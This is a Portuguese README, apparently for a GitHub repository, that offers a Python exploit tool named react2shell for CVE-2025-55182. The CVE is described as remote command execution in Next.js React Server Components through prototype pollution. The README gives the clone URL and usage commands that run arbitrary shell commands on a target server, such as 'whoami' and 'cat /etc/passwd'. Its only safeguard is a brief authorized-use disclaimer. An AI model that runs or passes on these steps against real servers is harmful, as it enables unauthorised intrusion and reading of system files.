
Uma ferramenta de exploração para a vulnerabilidade CVE-2025-55182 do Next.js que permite execução remota de comandos através de envenenamento de protótipo em React Server Components.
Exploit em Python para a vulnerabilidade RCE em React Server Components do Next.js com suporte a HTTP/HTTPS.
# Clone & execute
git clone https://github.com/BrianLopezM99/react2shell-CVE-2025-55182.git
cd react2shell-CVE-2025-55182
python3 exploit_react2shell.py <URL> "<comando>"
# HTTP
python3 exploit_react2shell.py http://target.com:3000 "id"
python3 exploit_react2shell.py 192.168.1.100:8080 "ls -la"
# HTTPS
python3 exploit_react2shell.py https://target.com "whoami"
python3 exploit_react2shell.py https://target.com:8443 "cat /etc/passwd"
Apenas para testes de segurança autorizados.
Use somente em sistemas que você possui ou tem permissão explícita para testar. Nunca use para atividades ilegais.
child_process.execSync()Licença MIT — veja o arquivo LICENSE
Aviso: Apenas para fins educacionais. Sempre obtenha autorização adequada.
Última atualização: 8 de fevereiro de 2025
Versão: 2.0.0
Mantenedor: BrianLopezM99